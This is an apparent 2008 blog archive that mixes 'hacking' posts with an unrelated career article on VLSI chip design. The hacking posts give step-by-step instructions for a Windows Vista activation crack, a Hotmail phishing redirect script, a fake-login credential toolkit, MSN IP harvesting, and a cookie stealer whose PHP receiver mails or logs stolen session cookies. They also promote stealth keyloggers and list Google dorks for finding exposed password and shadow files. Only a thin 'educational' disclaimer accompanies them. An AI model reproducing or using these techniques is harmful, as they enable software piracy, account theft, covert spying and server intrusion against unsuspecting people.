Sunday, November 2, 2008

how to crack windows vista?


  1. Install Windows Vista Ultimate edition (or other edition) without product key.
  2. Windows Vista needs to be applied with 2099-ReArm trick, so that the counter of minutes to no activation required period will not return to normal after reboot. Click on Start Orb button.
  3. Select “All Programs”, then “Accessories”.
  4. Right click on “Command Prompt, then select “Run as Administrator (A)”.
  5. If User Account Control (UAC) prompt a warning message, click on “Continue”.
  6. In the command prompt, type date and press Enter. You will see the following:

    Microsoft Windows [Version 6.0.6000]
    Copyright (c) 2006 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>date
    Current date: 12/19/2006 Thursday
    Enter new date:
  7. Enter 12/31/2099 (December 31, 2099).
  8. Next, type cscript slmgr.vbs -rearm. You will see something like the following:

    C:\Windows\system32>cscript slmgr.vbs -rearm
    Microsoft (R) Windows Script Host Version 5.7
    Copyright (C) Microsoft Corporation. All rights reserved.

    The command completed successfully.
    To make the change effectively, please restart the system.
  9. Then reset the date of the system to current date again by typing date again. You will see the following:

    Microsoft Windows [Version 6.0.6000]
    Copyright (c) 2006 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>date
    Current date: 12/31/2099 Thursday
    Enter new date:
  10. Type in current date, i.e. 12/19/2006.
  11. Exit from command prompt, but do not restart the computer.
  12. Download StopTimer.zip, StopTimer.zip, StopTimer.zip or StopTimer.zip torrent.
  13. Extract the downloaded archive file into a folder. It should contains “Vista test crack.exe” and “timerstop.sys”.
  14. Execute or run the “Vista test crack.exe” by right click on “Vista test crack.exe”, and select “Run as Administrator (A)”.
  15. Optional: Press in Test button, and it will pop up a message says 4 timers are stopped. At this time, the counter should be freezed, Check with slmgr.vbs -dlvcommand, with the minutes left should be the same after a few minutes interval. If it’s the case, continue with the following steps to run the crack every startup.
  16. In the Vista test crack window, click on “Install” button. You will be prompted with “Service installed” message if everything is done properly and correctly. The crack will copy the patched stoptimer.sys to system folder and install a new service named “timerstop” to stop kernel-mode timers in spsys.sys system file.
  17. Exit from the crack, and restart the computer.
  18. The hacking is basically done. Next few steps to to verify that the activation grace period built-in countdown timer is actually stopped and disable the timers from working properly, and make sure that the crack is installed properly. After restart, log on to Windows Vista. Run for a few minutes.
  19. Press on Windows + R keys.
  20. Type slmgr.vbs -dlv to check the time left to activate Windows Vista. If the time left is 43200 minutes that’s mean the crack is successful.


With the crack, you will have the following in the registry:


Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TimerStop]
“Type”=dword:00000001
“Start”=dword:00000002
“ErrorControl”=dword:00000000
“ImagePath”=hex(2):5c,00,3f,00,3f,00,5c,00,45,00,3a,00,5c,00,57,00,69,00,6e,00,\
64,00,6f,00,77,00,73,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,\
00,5c,00,54,00,69,00,6d,00,65,00,72,00,53,00,74,00,6f,00,70,00,2e,00,73,00,\
79,00,73,00,00,00
“DisplayName”=”TimerStop”


Further information:
  • The TimerStop vista test crack works on all 32-bit x86 Windows Vista edition such as Vista Ultimate and Vista Home Premium. Success rate in 64-bit (x64) environment is likely to be low.
  • The crack will make the time left to activate Vista to become always 43200 minutes (30 days), and will not countdown or reduce.
  • It’s possible to access Windows Update if you install Windows Vista with default product key (no product key entered when installation).
  • During the first 3 days of activation grace period after installing Windows Vista, Microsoft has designed it in such a way that Vista will allow greatest flexibility for users to install required drivers and application during this period, so Vista won’t prompt any reminder message for activation. After crack, Vista OS will always run with 30 days left for activation, thus there will not be any watermark or reminder to activate.
  • It’s possible to pass Windows Vista Genuine Advantage (WVGA) validation, so users able to download Microsoft value-added software for genuine customers.
  • As mentioned above, as Vista will also remain in first 3 days of activation grace period, in theory, Microsoft will not be able to differentiate who is the newly installed system, or who is the ‘patched’ system, unless of course, they check for the specific file or system (privacy anyone?).
  • Users can only view that there is 30 more days for system to be activated in the system properties, but it won’t affect system usage or installation method.




Disclaimer: This article is for educational and informational purpose only.


hacking techniques - update 1

Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch....

But many don't known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware....

So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss

Just follow the steps as instructed below

1) Go to http://www.google.com

2) type this syntax in search bar " 94FBR"

3) Replace Product name with desired software and leave a space then type 94FBR

4) Press enter, thats it

Now you receive Many pages which contains Serial no, Crack, Patches....

Just make a try, this simple trick works for many people

HACKING HOTMAIL

Introduction

We all use Hotmail!!!well its one of my Favorites.
Here m going to reveal n Alert About how the Unethical Hackers Can cheat us.

This Page is meant for Educational Purpose only. I do not Endorse Hacking at all but its Meant for knowing the Threats n Protect yourself also Curbing them
Topics

1:- How hotmail can be hacked with fake login screen (2 different ways)
2:- Fake e-mails threats
3:- Detect a fake message into hotmail
4:- How to get persons ip address through msn messenger
5:- curbing the way hackers get the passwords
6:- Easiest Way
7:- Change msn messenger title
8:- Protect yourself from Virus
9:- Hoax Toolbox v1.1
1) Protect yourself from Phishing

Usually The Unethical Hackers Upload their hotmail's fake login screen on a web server and then send these codes
to the victim from yahoo or another mail sending program. The codes are

script>
location.href="http://www.yoursite.com/yourhotmailfakepage.html\/"
< /script>

and the user will be automatically redirected to your fake hotmail screen from their e-mail box & you r Hacked.
Beware of There Threats

2) Beware of Fake Login Screens

They Start chatting with your victim and send him the fake login screen through Their messenger and try to pish you.
there are many many of them available on the net.. which are usually small Visual Basic programs.. never reveal your password anywhere other than the latest Versions of msn Messengers.

3) Fake e-mails threats

This is very easy go to http://www.boxfrog.com/ register( its blocked now) but there are many others .. google u ll find many click on create message and in from filed type in any ones e-mail address and the message will be sent.
there's also a simple way of doing this by Telnet ting from the dos Prompt.
Beware of this Threat .. make your spam protection Powerful

4) Detect a fake message into Hotmail inbox
This is Simple Buddies.. open your e-mail box go to options select display setting or message display setting or (some thing like this) now select full where it says message display settings or something like this. Open the mail which u thought to be fake now in the last where it says from u can see the address of that site from where the mail is sent but if some one has sent it through some sort of program it will tell u his ip. n once you know D ip m sure u know how to go between it there after
IMP: Read the ip address log from Backwards.

5) Protect urself revealing your ip address through msn messenger
When you Open your messenger start chatting with friend open ms dos and type netstat -n there do not press enter and then minimize it after this send something to your victim and as soon as he accept it the hotmail messenger will say connecting this is the time when u re maximize your MS-DOS and
press enter the ip address next to time wait: will the friends ip. U may be Hacked The same way

Beware!!
HoaX Toolbox v1.1
This is a PHP script that creates a website with an admin area that allows the user to choose between fake login pages of MSN Messenger, Hotmail, Yahoo and Google Mail, once you set up the script on a server that has PHP and SQL you will be able to log in the administration page and choose the fake login page to display to the main site, when the victim tries to log-in their mail/messenger, the website keeps the user/pass information in a log file that you can view anytime from the admin area, if the victim is not stupid enough to add their real log-in because they read the URL of your server instead of reading hotmail.com or yahoo.com in the URL bar then remember you can pop-up the main page of the site and disable the URL bar on the explorer, so when the user clicks on your real site the link "Yahoo Mail" an explorer without URL bar pops up, if you don't know how to pop up customized browsers search google


Hacking MSN


Small yet working trick
Hacking MSN is actually VERY simple. Msn is designed to route the connection through a Microsoft server while you are chatting. However, when a file is sent, a DCC (direct connection) is created. This was purposely done because otherwise Microsoft would waste a lot of bandwidth so a direct connection is made. This is your chance. Make a file transfer occur between u and a victim (try to send a big file), open up your command prompt (run "cmd" in NT/XP or "command" in 9X to get into prompt) and run netstat. usually the MSN targets IP would be above port 2000. enjoy.
If u receive some crap like gux1-43.primus.com as the target, do a reverse DNS lookup on it. However, this occurs very rarely, mostly u will receive a clear IP.

Once u have d IP u can do anything with him by Fingerprinting.

U can protect yourself from this occurring to you by using a proxy with MSN (under connections panel in options).

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.


Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.


First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail(" me@mydomain.com
 me@mydomain.com ", "Cookie stealer report", $cookie); // line 3
?> // line 4


Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to " me@mydomain.com
 me@mydomain.com " with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.


Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5


Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.


Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3


Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).


There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

Keystroke logging (often called keylogging) is a diagnostic tool used in software development that captures the user's keystrokes. It can be useful to determine sources of error in computer systems and is sometimes used to measure employee productivity on certain clerical tasks. Such systems are also highly useful for law enforcement and espionage—for instance, providing a means to obtain passwords or encryption keys and thus bypassing other security measures. However, keyloggers are widely available on the Internet and can be used by private parties to spy on the computer usage of others.

Writing software applications for keylogging is trivial, and like any computer program can be distributed as a trojan horse or as part of a virus. What is not trivial however, is installing a keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker.

lets see some of the key logger's what I known

Local Keylogger Pro 3.1 - Local Keylogger Pro allows you to monitor all users' activity on any computers in real time and record each computer's usage history. Local Keylogger Pro makes it easy to view, in real time, the screenshots of the any computers, all typed keystrokes, visited Web sites, used programs. You can view a list of running processes and terminate undesirable ones. Local Keylogger Pro can record all user activity to the log file. This information can be exported to HTML for convenient viewing in your web browser, or exported to MHT file for analysis. This allows you to see how long users worked with particular programs, how much time they spent on Internet, what sites they visited, what they typed in e-mails or chats.


XP Advanced Keylogger 2.5 - XP Advanced Keylogger is a top-rated invisible easy-to-use surveillance tool that records every keystroke to a log file. The log file can be sent secretly with email or FTP to a specified receiver. It can also detection specified keywords and take a screenshot whenever one is typed, displaying findings in a tidy log viewer. It causes no suspicious slowdowns and takes very few system resources. all this is happening in full stealth mode so the person you are monitoring will never be aware of it.{Windows 95, NT4, 98, Me, 2000, XP} 



Blazing Tools Perfect Keylogger 1.67 - Perfect Keylogger is a new generation keylogger which is absolutely undetectable. It was created as an alternative to very expensive commercial products like iSpyNow, Spector Keylogger or E-Blaster. It has the same functionality, but is significantly easier to use. Complex internal mechanisms are hidden from the user behind the friendly interface. You can install Keylogger and immediately use it without changing of its settings.

Perfect Keylogger is an extremely compact, award-winning tool. It is translated into 20 languages and is increasingly popular around the world! It lets you record all keystrokes, the time they were made and the application where they were entered. It works in the absolutely stealth mode. Stealth mode means that no button or icon is present in the Task Bar, and no process title is visible in the Task Manager list.

Also, Perfect Keylogger can carry out visual surveillance. It periodically makes screenshots in invisible mode and stores the compressed images on the disk so you can review them later.
Perfect Keylogger was the first keylogging software solution which can be absolutely invisible in the Windows NT/2000/XP/Vista Task Manager!


SC Keylogger Pro V3.2 - A Commercial Key Logger is a program that captures and logs keystrokes as they are entered on the computer for the purpose of monitoring the user. The logged data, which may be encrypted, is saved or sent to the person who installed the key logger. These applications often run in stealth mode and are invisible to the user that is being monitored. Such key loggers are sold commercially and may be used legitimately if deployed by authorized administrators and disclosed to the persons being monitored, as in a business environment. The use of a key logger to monitor persons without their knowledge has been ruled illegal in at least one jurisdiction.[
Download]



Hook Keylogger v2.1 - Small and stealth keylogger without an installer; simplest keylogger possible Specify log file location Uses a WH_JOURNALRECORD hooking procedure to capture everything typed Hide and unhide the interface by pressing Ctrl+Shift+F7 


Advanced Invisible Keylogger 1.8 - Advanced Invisible Keylogger is an stealth spy tool, the best spy software offered by ToolAnywhere! Advanced Invisible Keylogger runs silently at the lowest level of Windows capturing every keystroke including usernames and windows log-on passwords.

Advanced Invisible Keylogger can also capture active window text, text typed in all popular instant messengers including AOL, YAHOO, ICQ, MSN and AIM.

All Desktop activity will be recorded through Advanced Invisible Keylogger’s secret! Have reports sent to your email address at anytime secretly! Advanced Invisible Keylogger is so stealthy and hides so well that not even a computer technician with years of experience can detect it running!

The most powerful stealth program at a most affordable price! An easy-to-use stealth solution for PC and Internet surveillance. Purchase your copy today and feel safe and secure.

Google search engine can be used to hack into remote servers or gather confidential or sensitive information which are not visible through common searches.

Google is the world’s most popular and powerful search engine. It has the ability to accept pre-defined commands as inputs which then produces unbelievable results.

Google’s Advanced Search Query Syntax

Discussed below are various Google’s special commands and I shall be explaining each command in brief and will show how it can be used for getting confidential data.

[ intitle: ]

The “intitle:” syntax helps Google restrict the search results to pages containing that word in the title.

intitle: login password

will return links to those pages that has the word "login" in their title, and the word "password" anywhere in the page.

Similarly, if one has to query for more than one word in the page title then in that case “allintitle:” can be used instead of “intitle” to get the list of pages containing all those words in its title.

intitle: login intitle: password


is same as

allintitle: login password

[ inurl: ]

The “inurl:” syntax restricts the search results to those URLs containing the search keyword. For example: “inurl: passwd” (without quotes) will return only links to those pages that have "passwd" in the URL.

Similarly, if one has to query for more than one word in an URL then in that case “allinurl:” can be used instead of “inurl” to get the list of URLs containing all those search keywords in it.

allinurl: etc/passwd

will look for the URLs containing “etc” and “passwd”. The slash (“/”) between the words will be ignored by Google.

[ site: ]

The “site:” syntax restricts Google to query for certain keywords in a particular site or domain.

exploits site:hackingspirits.com
will look for the keyword “exploits” in those pages present in all the links of the domain “hackingspirits.com”. There should not be any space between “site:” and the “domain name”.

[ filetype: ]

This “filetype:” syntax restricts Google search for files on internet with particular extensions (i.e. doc, pdf or ppt etc).

filetype:doc site:gov confidential


will look for files with “.doc” extension in all government domains with “.gov” extension and containing the word “confidential” either in the pages or in the “.doc” file. i.e. the result will contain the links to all confidential word document files on the government sites.


[ link: ]

“link:” syntax will list down webpages that have links to the specified webpage.

link:www.expertsforge.com


will list webpages that have links pointing to the SecurityFocus homepage. Note there can be no space between the "link:" and the web page url.


[ related: ]

The “related:” will list web pages that are "similar" to a specified
web page.

related:www.expertsforge.com

will list web pages that are similar to the Securityfocus homepage. Note there can be no space between the "related:" and the web page url.

[ cache: ]

The query “cache:” will show the version of the web page that Google
has in its cache.

cache:www.hackingspirits.com

will show Google's cache of the Google homepage. Note there can be no space between the "cache:" and the web page url.

If you include other words in the query, Google will highlight those words within the cached document.

cache:www.hackingspirits.com guest


will show the cached content with the word "guest" highlighted.

[ intext: ]

The “intext:” syntax searches for words in a particular website. It ignores links or URLs and page titles.

intext:exploits


will return only links to those web pages that has the search keyword "exploits" in its webpage.


[ phonebook: ]

“phonebook” searches for 
U.S. street address and phone number information.

phonebook:Lisa+CA


will list down all names of person having “Lisa” in their names and located in “California (CA)”. This can be used as a great tool for hackers incase someone want to do dig personal information for social engineering. 

Google Hacks

Well, the Google’s query syntaxes discussed above can really help people to precise their search and get what they are exactly looking for.

Now Google being so intelligent search engine, hackers don’t mind exploiting its ability to dig much confidential and secret information from the net which they are not supposed to know. Now I shall discuss those techniques in details how hackers dig information from the net using Google and how that information can be used to break into remote servers.

Index Of

Using “Index of ” syntax to find sites enabled with Index browsing

A webserver with Index browsing enabled means anyone can browse the webserver directories like ordinary local directories. The use of “index of” syntax to get a list links to webserver which has got directory browsing enabled will be discussd below. This becomes an easy source for information gathering for a hacker. Imagine if the get hold of password files or others sensitive files which are not normally visible to the internet. Below given are few examples using which one can get access to many sensitive information much easily.

Index of /admin
Index of /passwd
Index of /password
Index of /mail

"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess

"Index of /secret"
"Index of /confidential"
"Index of /root"
"Index of /cgi-bin"
"Index of /credit-card"
"Index of /logs"
"Index of /config"


Looking for vulnerable sites or servers using “inurl:” or “allinurl:”

a. Using “allinurl:winnt/system32/” (without quotes) will list down all the links to the server which gives access to restricted directories like “system32” through web. If you are lucky enough then you might get access to the cmd.exe in the “system32” directory. Once you have the access to “cmd.exe” and is able to execute it.


b. Using “allinurl:wwwboard/passwd.txt”(without quotes) in the Google search will list down all the links to the server which are vulnerable to “WWWBoard Password vulnerability”. To know more about this vulnerability you can have a look at the following link:

http://www.securiteam.com/exploits/2BUQ4S0SAW.html

c. Using “inurl:.bash_history” (without quotes) will list down all the links to the server which gives access to “.bash_history” file through web. This is a command history file. This file includes the list of command executed by the administrator, and sometimes includes sensitive information such as password typed in by the administrator. If this file is compromised and if contains the encrypted unix (or *nix) password then it can be easily cracked using “John The Ripper”.

d. Using “inurl:config.txt” (without quotes) will list down all the links to the servers which gives access to “config.txt” file through web. This file contains sensitive information, including the hash value of the administrative password and database authentication credentials.

For Example: Ingenium Learning Management System is a Web-based application for Windows based systems developed by Click2learn, Inc. Ingenium Learning Management System versions 5.1 and 6.1 stores sensitive information insecurely in the config.txt file. For more information refer the following
links: http://www.securiteam.com/securitynews/6M00H2K5PG.html

Other similar search using “inurl:” or “allinurl:” combined with other syntax


inurl:admin filetype:txt
inurl:admin filetype:db
inurl:admin filetype:cfg
inurl:mysql filetype:cfg
inurl:passwd filetype:txt
inurl:iisadmin
inurl:auth_user_file.txt
inurl:orders.txt
inurl:"wwwroot/*."
inurl:adpassword.txt
inurl:webeditor.php
inurl:file_upload.php

inurl:gov filetype:xls "restricted"
index of ftp +.mdb allinurl:/cgi-bin/ +mailto


Looking for vulnerable sites or servers using “intitle:” or “allintitle:”

a. Using [allintitle: "index of /root”] (without brackets) will list down the links to the web server which gives access to restricted directories like “root” through web. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

b. Using [allintitle: "index of /admin”] (without brackets) will list down the links to the websites which has got index browsing enabled for restricted directories like “admin” through web. Most of the web application sometimes uses names like “admin” to store admin credentials in it. This directory sometimes contains sensitive information which can be easily retrieved through simple web requests.

Other similar search using “intitle:” or “allintitle:” combined with other syntax

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

Thursday, October 23, 2008

Career in VLSI

PROLOGUE
Most of the students of Electronics Engineering are exposed to Integrated Circuits (IC's) at a very basic level, involving SSI (small scale integration) circuits like logic gates or MSI (medium scale integration) circuits like multiplexers, parity encoders etc. But there is a lot bigger world out there involving miniaturization at levels so great, that a micrometer and a microsecond are literally considered huge! This is the world of VLSI - Very Large Scale Integration. The article aims at trying to introduce to the possibilities and the work involved in this field.

INTRODUCTION
What is VLSI? VLSI stands for "Very Large Scale Integration". This is the field, which involves packing more and more logic devices into smaller and smaller areas. Thanks to VLSI, circuits that would have taken boardfuls of space can now be put into a small space few millimeters across! This has opened up a big opportunity to do things that were not possible before. VLSI circuits are everywhere ... your computer, your car, your brand new state-of-the-art digital camera, the cell-phones, and what have you. All this involves a lot of expertise on many fronts within the same field, which we will look at in later sections. VLSI has been around for a long time, there is nothing new about it ... but as a side effect of advances in the world of computers, there has been a dramatic proliferation of tools that can be used to design VLSI circuits. Alongside, obeying Moore's law, the capability of an IC has increased exponentially over the years, in terms of computation power, utilization of available area, yield. The combined effect of these two advances is that people can now put diverse functionality into the IC's, opening up new frontiers. Examples are embedded systems, where intelligent devices are put inside everyday objects, and ubiquitous computing where small computing devices proliferate to such an extent that even the shoes you wear may actually do something useful like monitoring your heartbeats! These two fields are related, and getting into their description can easily lead to another article.

 

DEALING WITH VLSI CIRCUITS

Digital VLSI circuits are predominantly CMOS based. The way normal blocks like latches and gates are implemented is different from what students have seen so far, but the behavior remains the same. All the miniaturization involves new things to consider. A lot of thought has to go into actual implementations as well as design. Let us look at some of the factors involved...

  1. Circuit Delays. Large complicated circuits running at very high frequencies have one big problem to tackle - the problem of delays in propagation of signals through gates and wires ... even for areas a few micrometers across! The operation speed is so large that as the delays add up, they can actually become comparable to the clock speeds.
  1. Power. Another effect of high operation frequencies is increased consumption of power. This has two-fold effect - devices consume batteries faster, and heat dissipation increases. Coupled with the fact that surface areas have decreased, heat poses a major threat to the stability of the circuit itself.
  1. Layout. Laying out the circuit components is task common to all branches of electronics. What's so special in our case is that there are many possible ways to do this; there can be multiple layers of different materials on the same silicon, there can be different arrangements of the smaller parts for the same component and so on.

The power dissipation and speed in a circuit present a trade-off; if we try to optimize on one, the other is affected. The choice between the two is determined by the way we chose the layout the circuit components. Layout can also affect the fabrication of VLSI chips, making it either easy or difficult to implement the components on the silicon.

 

THE VLSI DESIGN PROCESS 
A typical digital design flow is as follows:

  • Specification
  • Architecture
  • RTL Coding
  • RTL Verification
  • Synthesis
  • Backend
  • Tape Out to Foundry to get end product..a wafer with repeated number of identical Ics.

 

All modern digital designs start with a designer writing a hardware description of the IC (using HDL or Hardware Description Language) in Verilog/VHDL. A Verilog or VHDL program essentially describes the hardware (logic gates, Flip-Flops, counters etc) and the interconnect of the circuit blocks and the functionality. Various CAD tools are available to synthesize a circuit based on the HDL.

Without going into details, we can say that the VHDL, can be called as the "C" of the VLSI industry. VHDL stands for "VHSIC Hardware Definition Language", where VHSIC stands for "Very High Speed Integrated Circuit". This languages is used to design the circuits at a high-level, in two ways. It can either be a behavioral description, which describes what the circuit is supposed to do, or a structural description, which describes what the circuit is made of. There are other languages for describing circuits, such as Verilog, which work in a similar fashion.

Both forms of description are then used to generate a very low-level description that actually spells out how all these are to be fabricated on the silicon chips. This will result in the manufacture of the intended IC.

A typical analog design flow is as follows:

In case of analog design, the flow changes somewhat.

·         Specifications

·         Architecture

·         Circuit Design

·         Simulation

·         Layout

·         Parametric Extraction / Back Annotation

·         Final Design

·         Tape Out to foundry.

 

While digital design is highly automated now, very small portion of analog design can be automated. There is a hardware description language called AHDL but is not widely used as it does not accurately give us the behavioral model of the circuit because of the complexity of the effects of parasitic on the analog behavior of the circuit. Many analog chips are what are termed as "flat" or non-hierarchical designs. This is true for small transistor count chips such as an operational amplifier, or a filter or a power management chip. For more complex analog chips such as data converters, the design is done at a transistor level, building up to a cell level, then a block level and then integrated at a chip level. Not many CAD tools are available for analog design even today and thus analog design remains a difficult art.

 

MOST OF TODAY'S VLSI DESIGNS ARE CLASSIFIED INTO THREE CATEGORIES:

  1. Analog: Small transistor count precision circuits such as Amplifiers, Data converters, filters, Phase Locked Loops, Sensors etc.

 

  1. ASICS or Application Specific Integrated Circuits: Progress in the fabrication of IC's has enabled us to create fast and powerful circuits in smaller and smaller devices. This also means that we can pack a lot more of functionality into the same area. The biggest application of this ability is found in the design of ASIC's. These are IC's that are created for specific purposes - each device is created to do a particular job, and do it well. The most common application area for this is DSP - signal filters, image compression, etc. To go to extremes, consider the fact that the digital wristwatch normally consists of a single IC doing all the time-keeping jobs as well as extra features like games, calendar, etc.

 

  1. SoC or Systems on a chip: These are highly complex mixed signal circuits (digital and analog all on the same chip). A network processor chip or a wireless radio chip is an example of an SoC.  

 

DEVELOPMENTS IN THE FIELD OF VLSI

There are a number of directions a person can take in VLSI, and they are all closely related to each other. Together, these developments are going to make possible the visions of embedded systems and ubiquitous computing.

  1. Reconfigurable computing: Reconfigurable computing is a very interesting and pretty recent development in microelectronics. It involves fabricating circuits that can be reprogrammed on the fly! And no, we are not talking about microcontrollers running with EEPROM inside. Reconfigurable computing involves specially fabricated devices called FPGA's, that when programmed act just like normal electronic circuits. They are so designed that by changing or "reprogramming" the connections between numerous sub modules, the FPGA's can be made to behave like any circuit we wish. This fantastic ability to create modifiable circuits again opens up new possibilities in microelectronics. Consider for example, microprocessors, which are partly reconfigurable. We know that running complex programs can benefit greatly if support was built into the hardware itself. We could have a microprocessor that could optimize itself for every task that it tackled! Or then consider a system that is too big to implement on hardware that may be limited by cost, or other constraints. If we use a reconfigurable platform, we could design the system so that parts of it are mapped onto the same hardware, at different times. One could think of many such applications, not the least of which is prototyping - using an FPGA to try out a new design before it is actually fabricated. This can drastically reduce development cycles, and also save some money that would have been spent in fabricating prototype IC's .
  1. Software Engineers taking over hardware design? ASIC's provide the path to creating miniature devices that can do a lot of diverse functions. But with the impending boom in this kind of technology, what we need is a large number of people who can design these IC's. This is where we realize that we cross the threshold between a chip designer and a systems designer at a higher level. Does a person designing a chip really need to know every minute detail of the IC manufacturing process? Can there be tools that allow a designer to simply create design specifications that get translated into hardware specifications? The solution to this is rather simple - hardware compilers or silicon compilers as they are called. We know by now, that there exist languages like VHDL which can be used to specify the design of a chip. What if we had a compiler that converts a high level language into a VHDL specification? The potential of this technology is tremendous - in simple manner, we can convert all the software programmers into hardware designers!
  1. The need for hardware compilers: Before we go further let us look at why we need this kind of technology, that can convert high-level languages into hardware definitions. We see a set of needs, which actually lead from one to the other in a series.
    1. Rapid development cycles. The traditional method of designing hardware is a long and winding process, going through many stages with special effort spent in design verification at every stage. This means that the time from drawing board to market is very long. This proves to be rather undesirable in case of large expanding market, with many competitors trying to grab a share. We need alternatives to cut down on this time so that new ideas reach the market faster, where the first person to get in normally gains a large advantage.
    1. Large number of designers. With embedded systems becoming more and more popular, there is a need for a large number of chip designers, who can churn out chips designed for specific applications. It's impractical to think of training so many people in the intricacies of VLSI design.
    1. Specialized training. A person who wishes to design ASIC's will require extensive training in the field of VLSI design. But we cannot possibly expect to find a large number of people who would wish to undergo such training. Also, the process of training these people will itself entail large investments in time and money. This means there has to be system which can abstract out all the details of VLSI, and which allows the user to think in simple system-level terms. There are quite a few tools available for using high-level languages in circuit design. But this area has started showing fruits only recently. For example, there is a language called Handel-C, that looks just like good old C. But it has some special extensions that make it usable for defining circuits. A program written in Handel-C, can be represented block-by-block by hardware equivalents. And in doing all this, the compiler takes care of all low-level issues like clock-frequency, layout, etc. The biggest selling point is that the user does not really have to learn anything new, except for the few extensions made to C, so that it may be conveniently used for circuit design. Another quite different language, that is still under development, is Lava. This is based on an esoteric branch of computer science, called "functional programming". FP itself is pretty old, and is radically different from the normal way we write programs. This is because it assumes parallel execution as a part of its structure - its not based on the normal idea of "sequence of instructions". This parallel nature is something very suitable for hardware since the logic circuits are is inherently parallel in nature. Preliminary studies have shown that Lava can actually create better circuits than VHDL itself, since it affords a high-level view of the system, without losing sight of low-level features.

 

WHAT SORTS OF JOBS DOES AN ELECTRONICS ENGINEER DO?

As mentioned above, the main job functions in this industry are Design, Product, Test, Applications and Process Engineering. For the sake of clarity, product engineering and test engineering functions are described separately, but it is most efficient to combine these two functions into one engineer because of the interdependency and overlap of skills, tasks and job functions. 

1.        Design Engineer: Takes specifications, defines architecture, does circuit design, runs simulations, supervises layout, tapes out the chip to the foundry, evaluates the prototype once the chip comes back from the fab.

  1. Product Engineer: Gets involved in the project during the design phase, ensures manufacturability, develops characterization plan, assembly guidelines, develops quality and reliability plan, evaluates the chip with the design engineer, evaluates the chip through characterization, reliability qualification and manufacturing yield point of view (statistical data analysis). He is responsible for production release and is therefore regarded as a team leader on the project. Post production, he is responsible for customer returns, failure analysis, and corrective actions including design changes.
  1. Test Engineer: Develops test plan for the chip based on specifications and data sheet, creates characterization and production program for the bench test or the ATE (Automatic Test Equipment), designs test board hardware, correlates ATE results with the bench results to validate silicon to compare with simulation results. He works closely with the product engineer to ensure smooth release to production and post release support.
  1. Applications Engineer: Defines new products from system point of view at the customer's end, based on marketing input. His mission is to ensure the chip works in the system designed or used by the customers, and complies with appropriate standards (such as Ethernet, SONET, WiFi etc.). He is responsible for all customer technical support, firmware development, evaluation boards, data sheets and all product documentation such as application notes, trade shows, magazine articles, evaluation reports, software drives and so on.
  1. Process Engineer: This is a highly specialized function which involves new wafer process development, device modeling, and lots of research and development projects. There are no quick rewards on this job! If you are R&D oriented, highly trained in semiconductor device physics area, do not mind wearing bunny suits (the clean room uniforms used in all fabs), willing to experiment, this job is for you.
  1. Packaging Engineer: This is another highly specialized job function. He develops precision packaging technology, new package designs for the chips, does the characterization of new packages, and does electrical modeling of the new designs.
  1. CAD Engineer: This is an engineering function that supports the design engineering function. He is responsible for acquiring, maintaining or developing all CAD tools used by a design engineer. Most companies buy commercially available CAD tools for schematic capture, simulation, synthesis, test vector generation, layout, parametric extraction, power estimation, and timing closure; but in several cases, these tools need some type of customization. A CAD engineer needs to be highly skilled in the use of these tools, be able to write software routines to automate as many functions as possible and have a clear understanding of the entire design flow.

